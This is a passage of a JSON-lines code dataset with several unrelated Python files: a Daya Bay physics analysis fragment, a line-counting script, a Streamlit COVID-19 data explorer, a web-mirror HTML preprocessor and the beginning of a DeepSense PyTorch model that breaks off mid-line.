num_coincidences_by_run\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n counts = np.array(cursor.fetchall()).reshape(-1)\n return counts\n\ndef coincidences_rates(database, label, general_label):\n \"\"\"Return an array of coincidence rates (per day) from EH1-AD1 to EH3-AD4.\n\n Rates are corrected for muon and multiplicity efficiency.\n \"\"\"\n counts = coincidences_counts(database, label)\n daq_livetimes = daq_livetime_days(database, general_label)\n mult_effs = multiplicity_efficiency(database, general_label)\n muon_effs = muon_efficiency(database, general_label)\n rates = counts / mult_effs / muon_effs / daq_livetimes\n return rates\n\ndef target_protons(database, label):\n \"\"\"Return a 2D array of target protons (x1e25) and uncertainties from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n GdLS_kg,\n GdLS_err_kg,\n LS_kg,\n LS_err_kg,\n Acrylic_kg,\n Acrylic_err_kg\n FROM\n target_mass\n ORDER BY\n Hall,\n DetNo\n '''\n )\n masses = np.array(cursor.fetchall())\n cursor.execute('''\n SELECT\n GdLS_density,\n GdLS_err,\n LS_density,\n LS_err,\n Acrylic_density,\n Acrylic_err\n FROM\n proton_densities\n WHERE\n Source = ?\n ''',\n (label,)\n )\n densities = np.array(cursor.fetchall()).reshape(-1)\n num_protons_GdLS = masses[:, 0] * densities[0]\n num_protons_LS = masses[:, 2] * densities[2]\n num_protons_acrylic = masses[:, 4] * densities[4]\n num_protons_total = num_protons_GdLS + num_protons_LS + num_protons_acrylic\n err_GdLS = num_protons_GdLS * np.sqrt(\n (masses[:, 1]/masses[:, 0])**2 + (densities[1]/densities[0])**2\n )\n err_LS = num_protons_LS * np.sqrt(\n (masses[:, 3]/masses[:, 2])**2 + (densities[3]/densities[2])**2\n 
)\n err_acrylic = num_protons_acrylic * np.sqrt(\n (masses[:, 5]/masses[:, 4])**2 + (densities[5]/densities[4])**2\n )\n err_total = np.sqrt(err_GdLS**2 + err_LS**2 + err_acrylic**2)\n return np.stack((num_protons_total, err_total), axis=-1)\n\n\n","sub_path":"dyb_analysis/event_selection/compute_dataset_summary.py","file_name":"compute_dataset_summary.py","file_ext":"py","file_size_in_byte":8071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"364065323","text":"#! python3\nimport sys, os\n\nlength = len(sys.argv)\nif length == 1:\n\tprint (\"Please specify the file extension, eg: cpp java.\")\n\tsys.exit()\n\ndef countFileLines(filename):\n\tcount = 0\n\twith open (filename, 'rb') as f:\n\t\tfor line in f:\n\t\t\tcount += 1\n\t\n\tprint (\"The line of \" + filename + \" is: \" + str(count))\n\treturn count;\n\ndef countDirFiles(dirpath):\n\tlines = 0\n\tdirs = os.listdir(dirpath)\n\tfor file in dirs:\n\t\tfor i in range(length):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\n\t\t\tif (os.path.splitext(file)[1][1:] == str(sys.argv[i])):\n\t\t\t\tlines += countFileLines(dirpath + file)\n\t\t\n\t\tif (os.path.isdir(dirpath + file)):\n\t\t\tlines += countDirFiles(dirpath + file + \"\\\\\")\n\treturn lines;\n\n\npath = os.getcwd() + \"\\\\\"\nprint (\"The total lines is \" + str(countDirFiles(path)))\n\nprint (\"---------------------------\")\n","sub_path":"countlines.py","file_name":"countlines.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"139506770","text":"import copy\r\nimport datetime\r\nimport math\r\nimport os\r\nimport altair as alt\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom matplotlib.backends.backend_agg import RendererAgg\r\nimport plotly.express as px\r\nfrom numpy import nan as Nan\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom plotly.subplots import make_subplots\r\nimport plotly.graph_objects as go\r\nplt.rcParams['figure.figsize'] = 10, 12\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport seaborn as sns\r\nfrom PIL import Image\r\n\r\n# todo states where cases and deaths are most and least correlated\r\n\r\n\r\nst.set_page_config(\r\n page_title=\"Covid-19 Forecast and Correlation Explorer\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\",\r\n)\r\n\r\n\r\n@st.cache(suppress_st_warning=True)\r\ndef process_data(country):\r\n \"\"\"\r\n Process CSVs. 
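Reads Data/owid-covid-data.csv (OWID layout; the exact column names are an assumption taken from the code below). 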
Smooth and compute new series.\r\n    :param country: Selected country\r\n    :return: Dataframe\r\n    \"\"\"\r\n    # Data\r\n    df = (pd.read_csv(\"Data/owid-covid-data.csv\")\r\n          .sort_values(\"date\", ascending=True)\r\n          .reset_index()\r\n          .query('location==\"{}\"'.format(country))\r\n          )\r\n    \r\n    df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')\r\n    df = df.query(\"date >= '2020-03-01' \")\r\n    df.set_index(\"date\", inplace=True)\r\n\r\n    # Rolling means\r\n    df[\"new_tests\"] = df[\"new_tests\"].rolling(7).mean()\r\n    df[\"total_deaths\"] = df[\"total_deaths\"].rolling(7).mean()\r\n    df[\"new_deaths\"] = df[\"new_deaths\"].rolling(7).mean()\r\n    df[\"hosp_patients\"] = df[\"hosp_patients\"].rolling(7).mean()\r\n    df[\"total_tests\"] = df[\"total_tests\"].rolling(7).mean()\r\n    df[\"icu_patients\"] = df[\"icu_patients\"].rolling(7).mean()\r\n    df[\"cardiovasc_death_rate\"] = df[\"cardiovasc_death_rate\"].rolling(7).mean()\r\n    df[\"total_cases\"] = df[\"total_cases\"].rolling(7).mean()\r\n\r\n    # New features\r\n    df[\"percentPositive\"] = (\r\n        (df[\"new_tests\"] / df[\"total_tests\"]).rolling(7).mean()\r\n    )\r\n    \r\n    df = calc_prevalence_ratio(df)\r\n\r\n    df[\"Infection Fatality Rate\"] = (\r\n        df[\"new_deaths\"] / (df[\"new_cases\"] * df[\"prevalence_ratio\"])\r\n    ) * 100\r\n    df[\"percentPositive\"] = df[\"percentPositive\"] * 100\r\n    df[\"Cumulative Recovered Infections Estimate\"] = (\r\n        df[\"total_cases\"] * df[\"prevalence_ratio\"] - df[\"total_deaths\"]\r\n    )\r\n    \r\n    if np.inf in df.values:\r\n        df = df.replace([np.inf, -np.inf], np.nan).dropna()\r\n    return df\r\n\r\n\r\ndef calc_prevalence_ratio(df):\r\n    \"\"\"\r\n    Calculate prevalence ratio\r\n    prevalence_ratio(day_i) = (1250 / (day_i + 25)) * (positivity_rate(day_i))^(0.5) + 2, where day_i is the number of days since February 12, 2020.\r\n    https://covid19-projections.com/estimating-true-infections-revisited/\r\n    :param df: Dataframe from process_data()\r\n    :return: Dataframe with prevalence_ratio column\r\n    \"\"\"\r\n\r\n    days_since = df.index - datetime.datetime(year=2020, month=2, day=12)\r\n    df[\"days_since_feb12\"] = days_since.days.values\r\n    p_r_list = []\r\n    for i, row in df.iterrows():\r\n        try:\r\n            prevalence_ratio = (1250 / (row['days_since_feb12'] + 25)) * math.pow(row['percentPositive'], 0.5) + 2\r\n            # prevalence_ratio = (1500 / (row[\"days_since_feb12\"] + 50)) * math.pow(\r\n            #     row[\"percentPositive\"], 0.5\r\n            # ) + 2\r\n            # prevalence_ratio = (1000 / (row[\"days_since_feb12\"] + 10)) * math.pow(row[\"percentPositive\"], 0.5) + 2\r\n            # st.write(prevalence_ratio)\r\n        except:\r\n            prevalence_ratio = p_r_list[-1]\r\n        p_r_list.append(prevalence_ratio)\r\n        # st.write(prevalence_ratio)\r\n    df[\"prevalence_ratio\"] = p_r_list\r\n    return df\r\n\r\n\r\n@st.cache()\r\ndef find_max_correlation(col, col2):\r\n    \"\"\"\r\n    Take two series and test all alignments for maximum correlation.\r\n    :param col: Column 1\r\n    :param col2: Column 2\r\n    :return: Best r, best shift\r\n    \"\"\"\r\n    best_cor = -1\r\n    best_i = 0\r\n    for i in range(len(col) // 5):\r\n        col1 = col.shift(i)\r\n        correl = col1.corr(col2)\r\n        if correl > best_cor:\r\n            best_cor = correl\r\n            best_i = i\r\n\r\n    return best_cor, best_i\r\n\r\n\r\ndef plot_cor(col, col2, best_i, best_cor):\r\n    \"\"\"\r\n    Plot interactive chart showing correlation between two shifted series.\r\n    :param col:\r\n    :param col2:\r\n    :param best_i:\r\n    :param best_cor:\r\n    \"\"\"\r\n    # st.line_chart({col.name: col.shift(best_i), col2.name: col2})\r\n    st.write(\r\n        \"{} shifted {} days ahead is correlated with {}. 
$r={}$\".format(\r\n col.name, best_i, col2.name, round(best_cor, 2)\r\n )\r\n )\r\n\r\n # altair chart\r\n src = pd.DataFrame({col.name: col.shift(best_i), col2.name: col2}).reset_index()\r\n base = alt.Chart(src).encode(alt.X(\"date:T\", axis=alt.Axis(title=None)))\r\n\r\n line = base.mark_line(stroke=\"orange\").encode(\r\n alt.Y(col.name, axis=alt.Axis(title=col.name, titleColor=\"orange\"))\r\n )\r\n\r\n line2 = base.mark_line(stroke=\"#5276A7\").encode(\r\n alt.Y(col2.name, axis=alt.Axis(title=col2.name, titleColor=\"#5276A7\"))\r\n )\r\n\r\n chrt = alt.layer(line, line2).resolve_scale(y=\"independent\")\r\n st.altair_chart(chrt, use_container_width=True)\r\n\r\n\r\n# @st.cache(ttl=TTL)\r\ndef get_shifted_correlations(df, cols):\r\n \"\"\"\r\n Interactive correlation explorer. For two series, finds the alignment that maximizes correlation.\r\n :param df:\r\n :param cols:\r\n :return:\r\n \"\"\"\r\n a = st.selectbox(\"Does this\", cols, index=3)\r\n b = st.selectbox(\"Correlate with this?\", cols, index=2)\r\n lb = st.slider(\r\n \"How far back should we look for correlations?\",\r\n min_value=0,\r\n max_value=len(df),\r\n value=len(df) - 90,\r\n step=10,\r\n format=\"%d days\",\r\n key=\"window2\",\r\n )\r\n\r\n cor, shift = find_max_correlation(df[a].iloc[-lb:], df[b].iloc[-lb:])\r\n col1, col2 = df[a].iloc[-lb:], df[b].iloc[-lb:]\r\n plot_cor(df[a].iloc[-lb:], df[b].iloc[-lb:], shift, cor)\r\n\r\n return cols, a, b, lb\r\n\r\n\r\ndef get_correlations(df, cols):\r\n st.header(\"Correlations\")\r\n df = df[cols]\r\n cor_table = df.corr(method=\"pearson\", min_periods=30)\r\n st.write(cor_table)\r\n max_r = 0\r\n max_idx = None\r\n seen = []\r\n cors = pd.DataFrame(columns=[\"a\", \"b\", \"r\"])\r\n for i in cor_table.index:\r\n for j in cor_table.index:\r\n if i == j or i == \"index\" or j == \"index\":\r\n continue\r\n if cor_table.loc[i, j] == 1:\r\n continue\r\n if cor_table.loc[i, j] > max_r:\r\n max_idx = (i, j)\r\n max_r = max(cor_table.loc[i, j], max_r)\r\n if (j, i) not in seen:\r\n cors = cors.append(\r\n {\"a\": i, \"b\": j, \"r\": cor_table.loc[i, j]}, ignore_index=True\r\n )\r\n seen.append((i, j))\r\n st.write(max_idx, max_r)\r\n st.write(cors.sort_values(\"r\", ascending=False).reset_index(drop=True))\r\n\r\ndef linearRegression(df,country):\r\n selected_columns=['iso_code', 'location', 'date', 'total_cases', 'new_cases', 'total_deaths','new_deaths','icu_patients','hosp_patients','new_tests', 'total_tests', 'total_vaccinations', 'people_vaccinated', 'people_fully_vaccinated', 'new_vaccinations'] \r\n new_df = df.loc[:, selected_columns]\r\n day = df[df['location'] == country].groupby('date')[['total_cases']].sum()\r\n x = np.arange(len(day))\r\n y= day.values\r\n x = x.reshape(-1,1)\r\n model = LinearRegression()\r\n model.fit(x,y)\r\n Yp=model.predict(x) \r\n st.header(f\"Predict COVID Cases trend in {country} using Linear Regression\")\r\n fig = plt.figure() \r\n ax = fig.add_subplot(2,2,1)\r\n ax.scatter(x,y)\r\n ax.plot(x,Yp)\r\n ax.set_xlabel(\"Days\")\r\n ax.set_ylabel(\"Nummber of Cases\")\r\n st.pyplot(fig) \r\n st.header(f\"Predict Vaccination trend in {country} using Linear Regression\")\r\n vac = df[df['location'] == country].groupby('date')[['people_fully_vaccinated']].sum()\r\n x1 = np.arange(len(vac))\r\n y1 = vac.values\r\n x1 =x1.reshape(-1,1)\r\n model.fit(x1,y1)\r\n Yp1=model.predict(x1) \r\n fig = plt.figure()\r\n ax = fig.add_subplot(2,2,2)\r\n ax.scatter(x1,y1)\r\n ax.plot(x1,Yp1)\r\n ax.set_xlabel(\"Days\")\r\n ax.set_ylabel(\"Nummber of People 
Vaccinated\")\r\n st.pyplot(fig) \r\n\r\n#TimeSeries Analaysis\r\n\r\ndef TimeSeries(country,country1,df):\r\n df_country= df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country))\r\n df_country['date'] = pd.to_datetime(df_country['date'], format='%Y-%m-%d')\r\n df_country = df_country.query(\"date >= '2020-02-01' \") \r\n df_country1 = df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country1))\r\n df_country1['date'] = pd.to_datetime(df_country1['date'], format='%Y-%m-%d')\r\n df_country1 = df_country1.query(\"date >= '2020-02-01' \") \r\n \r\n fig = px.bar(df_country, x=\"date\", y=\"total_cases\", color='total_cases', height=600, title=f'Total Confirmed Coronavirus Cases in {country}',color_discrete_sequence = px.colors.cyclical.IceFire)\r\n st.plotly_chart(fig)\r\n fig = px.bar(df_country1, x=\"date\", y=\"total_cases\", color='total_cases', orientation='v', height=600,\r\n title=f'Total Confirmed Coronavirus Cases in {country1}', color_discrete_sequence = px.colors.cyclical.IceFire)\r\n\r\n st.plotly_chart(fig)\r\n \r\ndef cumulativeCases(country1,country2,df):\r\n df_country1= df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country1))\r\n df_country1['date'] = pd.to_datetime(df_country1['date'], format='%Y-%m-%d')\r\n df_country1 = df_country1.query(\"date >= '2020-02-01' \") \r\n df_country2 = df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country2))\r\n df_country2['date'] = pd.to_datetime(df_country2['date'], format='%Y-%m-%d')\r\n fig = make_subplots(\r\n rows=2, cols=2,\r\n specs=[[{}, {}],\r\n [{\"colspan\": 2}, None]],\r\n subplot_titles=(country1,country2))\r\n\r\n fig.add_trace(go.Bar(x=df_country1['date'], y=df_country1['total_cases'],\r\n marker=dict(color=df_country1['total_cases'], coloraxis=\"coloraxis\")),1, 1)\r\n\r\n fig.add_trace(go.Bar(x=df_country2['date'], y=df_country2['total_cases'],\r\n marker=dict(color=df_country2['total_cases'], coloraxis=\"coloraxis\")),1, 2)\r\n \r\n fig.update_layout(coloraxis=dict(colorscale='Bluered_r'), showlegend=False,title_text=\"Total Confirmed cases(Cumulative)\")\r\n\r\n fig.update_layout(plot_bgcolor='rgb(230, 230, 230)')\r\n st.plotly_chart(fig)\r\n\r\ndef covidTrend(country1,country2,df): \r\n df_country1= df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country1))\r\n df_country1['date'] = pd.to_datetime(df_country1['date'], format='%Y-%m-%d')\r\n df_country1 = df_country1.query(\"date >= '2020-02-01' \") \r\n df_country2 = df.sort_values(\"date\", ascending=True).reset_index().query('location==\"{}\"'.format(country2))\r\n df_country2['date'] = pd.to_datetime(df_country2['date'], format='%Y-%m-%d') \r\n fig = make_subplots(rows=2, cols=2, specs=[[{}, {}], [{\"colspan\": 2}, None]], subplot_titles=(country1,country2))\r\n fig.add_trace(go.Scatter(x=df_country1['date'], y=df_country2['new_cases'], marker=dict(color=df_country1['total_cases'], coloraxis=\"coloraxis\")), 1, 1)\r\n fig.add_trace(go.Scatter(x=df_country2['date'], y=df_country2['new_cases'], marker=dict(color=df_country2['total_cases'], coloraxis=\"coloraxis\")), 1, 2)\r\n fig.update_layout(coloraxis=dict(colorscale='Bluered_r'), showlegend=False,title_text=\"Trend of New Coronavirus cases\")\r\n fig.update_layout(plot_bgcolor='rgb(250, 242, 242)')\r\n st.plotly_chart(fig)\r\n\r\ndef explorerData(df_country):\r\n st.title(\"Welcome to the Covid-19 Tracker 
Application\")\r\n st.markdown(\"\"\" \r\n \"\"\")\r\n # Summary Table\r\n\r\n st.header(f'Summary Table for the last {table_days} days.')\r\n \r\n st.markdown(\"\"\" This table includes the number of cases, deaths, new cases and moving average for your selection.\"\"\")\r\n\r\n #st.write(df_county.iloc[-table_days:,-4:])\r\n\r\n a = df_country.iloc[-table_days:, -4:]\r\n \r\n my_table = st.table(a)\r\n\r\n\r\n # Total Cases Graph\r\n\r\n st.header(f'Total Cases for {country}.')\r\n \r\n total_cases_chart = df_country['total_cases']\r\n\r\n \r\n st.line_chart(total_cases_chart)\r\n\r\n \r\n # Moving Average Graph\r\n\r\n st.header(f'{moving_average_day} moving average for {country}.')\r\n \r\n moving_average_chart = df_country['moving_average']\r\n \r\n st.line_chart(moving_average_chart)\r\n\r\n \r\n # Death Graph\r\n\r\n st.header(f'Total Deaths for {country}.')\r\n \r\n total_deaths_chart = df_country['total_deaths']\r\n \r\n st.line_chart(total_deaths_chart) \r\n\r\n#Solidity Example\r\n\r\n#main function\r\nif __name__ == \"__main__\": \r\n # todo global cols lists. One for cors and one for UI\r\n cols = [\r\n \"Infection Fatality Rate\",\r\n \"new_cases\",\r\n \"new_deaths\",\r\n \"hosp_patients\",\r\n \"icu_patients\",\r\n \"percentPositive\",\r\n \"total_tests\", \r\n ] \r\n \r\n w, h, = (\r\n 900,\r\n 400,\r\n )\r\n df_covid= pd.read_csv(\"Data/owid-covid-data.csv\")\r\n countries = pd.read_csv(\"Data/owid-covid-data.csv\")[\"location\"].unique()\r\n\r\n with st.sidebar:\r\n st.title(\"Covid-19 Data Explorer\")\r\n st.subheader(\"Select a page below:\")\r\n mode = st.radio(\r\n \"Menu\",\r\n [\r\n \"COVID Explorer\",\r\n \"Correlation Explorer\",\r\n \"Linear Regression\",\r\n \"TimeSeries Analysis\",\r\n \"BlockVax\"\r\n ],\r\n )\r\n st.subheader(\"Select a Country:\") \r\n country = st.selectbox(\"\",countries, index=37)\r\n\r\n # https://docs.streamlit.io/en/stable/troubleshooting/caching_issues.html#how-to-fix-the-cached-object-mutated-warning\r\n df = copy.deepcopy(process_data(country)) \r\n\r\n if mode == \"COVID Explorer\": \r\n st.sidebar.header(\"Covid-19 Data Explorer\") \r\n #country = st.sidebar.selectbox('Select Your Country:',countries) \r\n table_days = st.sidebar.slider('Select the number of days you want to be display in the Summary Table. ', min_value = 3, max_value= 15, value= 5, step=1)\r\n moving_average_day = st.sidebar.slider('How many days to consider for the moving average? 
', min_value=5, max_value=14, value=7, step=1)\r\n        # Creating the dataframe for the country\r\n        df_country = df_covid[(df_covid.location == country)].copy()\r\n        \r\n        # Create a new column for the moving average of new cases\r\n        df_country['moving_average'] = df_country.loc[:,'new_cases'].rolling(window=moving_average_day).mean()\r\n        if (country != \"\"):\r\n            explorerData(df_country)\r\n    elif mode == \"Correlation Explorer\":\r\n        st.title(\"Interactive Correlation Explorer\")\r\n        st.write(\"Choose two variables and see if they are correlated.\")\r\n        cols, a, b, lookback = get_shifted_correlations(df, cols) \r\n    elif mode == \"Linear Regression\": \r\n        linearRegression(df_covid,country)\r\n    elif mode == \"TimeSeries Analysis\": \r\n        st.sidebar.subheader(\"Select a Comparison Country:\") \r\n        country1 = st.sidebar.selectbox(\"\",countries, index=45)\r\n        if (country == country1):\r\n            st.write(\"Please select a different Comparison Country\")\r\n        elif (country != \"\" and country1 != \"\"):\r\n            TimeSeries(country,country1,df_covid)\r\n            # cumulativeCases(country,country1,df_covid)\r\n            covidTrend(country,country1,df_covid)\r\n    elif mode == \"BlockVax\":\r\n        st.title(\"Introducing BlockVax - Profile and Vaccine Data Registration\")\r\n        st.subheader(\"\\n\")\r\n        \r\n        st.markdown(\"\"\"\r\n        BlockVax is a smart contract which interacts with the Ethereum network to allow users to register a profile for themselves or others, generating a unique patient ID number and storing the profile data in a profile struct as part of a mapping. Profile registration requires the patient's address as well as a photo ID, which will be uploaded to [pinata](https://pinata.cloud/) and stored via an IPFS hash.\r\n        \"\"\")\r\n        img = Image.open(\"Images\\image1.png\")\r\n        st.image(img, width=200) \r\n        st.image(\"Images\\image2.png\", width=200)\r\n        \r\n        \r\n        st.markdown(\"\"\" \r\n        Once a profile has been created, registered vaccine providers are able to update the vaccine data of vaccinated patients by using the patient's address, ID number and photo URI as part of our token JSON schema shown below. \"\"\")\r\n        \r\n        st.image(\"Images\\image3.png\", width=200)\r\n        \r\n        \r\n        st.write(\"This function will then mint a non-fungible token using the patient's address and ID number and set the token URI, as well as update the patient's profile with the vaccine data.\") \r\n        st.image(\"Images\\image4.png\", width=200)\r\n        \r\n        st.write(\"Modifiers were created to restrict function access and to ensure only the right data can be inputted; since this contract interacts with a blockchain and is hence immutable, we do not want to waste gas fees on data errors or accidentally input incorrect data.\")\r\n        \r\n        st.markdown(\"\"\" Requirements include:\r\n        * Restriction of provider function use to only providers registered in the contract\r\n        * The vaccine name having to match our stored vaccine names\r\n        * Only valid patient IDs\r\n        * Only registered/valid patient addresses can be inputted\r\n        \"\"\")\r\n        st.image(\"Images\\image5.png\", width=200)\r\n        \r\n        st.image(\"Images\\image6.png\", width=200)\r\n        \r\n        st.markdown(\"\"\"Finally, our last function allows the user to search for a patient ID and check if they've been vaccinated. 
\r\n \"\"\")\r\n st.image(\"Images\\image7.png\", width=200)\r\n","sub_path":"finalmain.py","file_name":"finalmain.py","file_ext":"py","file_size_in_byte":18435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"216003634","text":"\n\n\nimport WebMirror.PreProcessors.PreProcessorBase\nimport urllib.parse\nimport bs4\nimport WebRequest\n\n\n\nclass CreativeNovelsPreprocessor(WebMirror.PreProcessors.PreProcessorBase.ContentPreprocessor):\n\n\tloggerPath = \"Main.Preprocessor.JsRenderer\"\n\n\tdef preprocessContent(self, url, mimetype, contentstr):\n\t\tif mimetype != 'text/html':\n\t\t\treturn contentstr\n\n\t\tif isinstance(contentstr, bytes):\n\t\t\tcontentstr = bs4.UnicodeDammit(contentstr).unicode_markup\n\n\t\tsoup = WebRequest.as_soup(contentstr)\n\t\tnext_chp_links = soup.find_all(\"a\", class_='nextkey')\n\t\tprev_chp_links = soup.find_all(\"a\", class_='prevkey')\n\n\t\tfor tag in next_chp_links:\n\t\t\ttag.string = \"Next chapter\"\n\t\tfor tag in prev_chp_links:\n\t\t\ttag.string = \"Previous chapter\"\n\n\t\tfor bogus in soup.find_all(\"div\", class_='x-modal-content'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='wpdiscuz_unauth'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='wpd-default'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='imagepost'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='donation'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"form\", class_='x-search'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"ul\", class_='x-menu'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='comments-area'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='respond'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='x-bar-space-v'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", class_='e23-20'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"button\"):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"a\", id='wpdUserContentInfoAnchor'):\n\t\t\tbogus.decompose()\n\t\tfor bogus in soup.find_all(\"div\", id='wpdUserContentInfo'):\n\t\t\tbogus.decompose()\n\n\t\tappends = []\n\t\tfor item in soup.find_all('div', class_='togglepost'):\n\t\t\t# print(\"found append\")\n\t\t\tappends.append(item.extract())\n\n\t\ttgtdiv = soup.find(\"article\", class_='post')\n\n\t\tif tgtdiv:\n\t\t\ttgtdiv = tgtdiv.parent.parent\n\t\t\ttgtdiv.append(soup.new_tag('hr'))\n\t\t\tfor append in appends:\n\t\t\t\t# print(\"Appending:\", append)\n\t\t\t\ttgtdiv.append(append)\n\n\t\t# There should only ever be one of these.\n\t\tfor mature_div in soup.find_all(\"div\", class_='include_content_rating'):\n\t\t\tfor item in mature_div.find_all('div', class_='list-group-item'):\n\t\t\t\titem.decompose()\n\n\t\treturn soup.prettify()\n\n\t@staticmethod\n\tdef wantsUrl(url):\n\t\tnetloc = urllib.parse.urlsplit(url).netloc\n\t\tif netloc.lower().endswith(\"creativenovels.com\"):\n\t\t\tprint(\"CreativeNovelsPreprocessor wants URL: %s\" % url)\n\t\t\treturn True\n\n\t\treturn False\n","sub_path":"WebMirror/PreProcessors/CreativeNovelsPreprocess.py","file_name":"CreativeNovelsPreprocess.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"555686887","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd 
import Variable\nimport math\n\nSPECTRAL_SAMPLES = 10\nFEATURE_DIM = SPECTRAL_SAMPLES * 6 * 2\nCONV_LEN = 3\nCONV_LEN_INTE = 3  # 4\nCONV_LEN_LAST = 3  # 5\nCONV_NUM = 64\nCONV_MERGE_LEN = 8\nCONV_MERGE_LEN2 = 6\nCONV_MERGE_LEN3 = 4\nCONV_NUM2 = 64\nINTER_DIM = 120\nOUT_DIM = 6  # len(idDict)\nWIDE = 20\n\n\n###### Import training data\n\n\nclass SingleSensorTransformer(nn.Module):\n    def __init__(self, args, n_feature=3):\n        super(SingleSensorTransformer, self).__init__()\n        self.conv1 = nn.Conv2d(in_channels=1, out_channels=CONV_NUM,\n                               kernel_size=(2 * 3 * CONV_LEN, 1), stride=(2 * 3, 1), padding=0)\n        self.batch_norm1 = nn.BatchNorm2d(CONV_NUM)\n\n        self.relu1 = nn.ReLU()\n        self.dropout1 = nn.Dropout(p=args.dropout)\n\n        self.conv2 = nn.Conv2d(in_channels=CONV_NUM, out_channels=CONV_NUM,\n                               kernel_size=(CONV_LEN_INTE, 1), stride=(1, 1), padding=0)\n        self.batch_norm2 = nn.BatchNorm2d(CONV_NUM)\n        self.relu2 = nn.ReLU()\n        self.dropout2 = nn.Dropout(p=args.dropout)\n\n        self.conv3 = nn.Conv2d(in_channels=CONV_NUM, out_channels=CONV_NUM,\n                               kernel_size=(CONV_LEN_LAST, 1), stride=(1, 1), padding=0)\n        self.batch_norm3 = nn.BatchNorm2d(CONV_NUM)\n        self.relu3 = nn.ReLU()\n\n    def forward(self, x):\n        \"\"\"\n\n        :param x: b(batch, channel, length)\n        :return:\n        \"\"\"\n        # Assume that x (batch, wide, feature_dim, channel=1)\n\n        # (batch, wide, feature_dim, channel = 1)\n        x = self.conv1(x)\n        x = self.batch_norm1(x)\n        x = self.relu1(x)\n        x = self.dropout1(x)\n\n        x = self.conv2(x)\n        x = self.batch_norm2(x)\n        x = self.relu2(x)\n        x = self.dropout2(x)\n\n        x = self.conv3(x)\n        x = self.batch_norm3(x)\n        x = self.relu3(x)\n        return x\n\n\nclass MultipSensorTransformer(nn.Module):\n    def __init__(self, args):\n        super(MultipSensorTransformer, self).__init__()\n        n_feature = CONV_NUM * 3\n        self.conv1 = nn.Conv2d(in_channels=CONV_NUM * 3, out_channels=CONV_NUM2,\n                               kernel_size=(2 * 3 * CONV_LEN, 1), stride=(CONV_MERGE_LEN, 1), padding=0)\n        self.batch_norm1 = nn.BatchNorm2d(CONV_NUM2)\n\n        self.relu1 = nn.ReLU()\n        self.dropout1 = nn.Dropout(p=args.dropout)\n\n        self.conv2 = nn.Conv2d(in_channels=CONV_NUM2, out_channels=CONV_NUM2,\n                               kernel_size=(CONV_LEN_INTE, 1), stride=(CONV_MERGE_LEN2, 1), padding=0)\n        self.batch_norm2 = nn.BatchNorm2d(CONV_NUM2)\n        self.relu2 = nn.ReLU()\n        self.dropout2 = nn.Dropout(p=args.dropout)\n\n        self.conv3 = nn.Conv2d(in_channels=CONV_NUM2, out_channels=CONV_NUM2,\n                               kernel_size=(CONV_LEN_LAST, 1), stride=(CONV_MERGE_LEN3, 1), padding=0)\n        self.batch_norm3 = nn.BatchNorm2d(CONV_NUM2)\n        self.relu3 = nn.ReLU()\n        self.dropout3 = nn.Dropout(p=args.dropout)  # referenced by forward below\n\n    def forward(self, x):\n        # Assume that x (batch, wide, feature_dim, channel=1)\n        x = self.dropout1(x)\n        x = self.conv1(x)\n        x = self.batch_norm1(x)\n        x = self.relu1(x)\n\n        x = self.dropout2(x)\n        x = self.conv2(x)\n        x = self.batch_norm2(x)\n        x = self.relu2(x)\n\n        x = self.dropout3(x)\n        x = self.conv3(x)\n        x = self.batch_norm3(x)\n        x = self.relu3(x)\n\n        return x\n\n\n# Define the model\nclass DeepSense(nn.Module):\n    def __init__(self, args, n_feature, n_class):\n        super(DeepSense, self).__init__()\n        w = args.window_size\n        p = self.tpoint = args.tpoint\n\n        self.n_class = n_class\n        self.n_feature = n_feature\n        self.hidden_size = args.unit\n        dropout = args.dropout\n        if w % args.tpoint == 0:\n            self.rnn_step = w // p\n        else:\n            self.rnn_step = w // p + 1\n        padding_size = self.rnn_step * p - w\n        self.padding = nn.ZeroPad2d((0, 0, padding_size, 0))\n\n        # print(' | Input dim: %d' % (self.input_dim))\n        # print(' | RNN step: %d' % (self.rnn_step))\n        # print(' | Tpoint step: %d' % (p))\n        # print(' | Feature: %d' % 
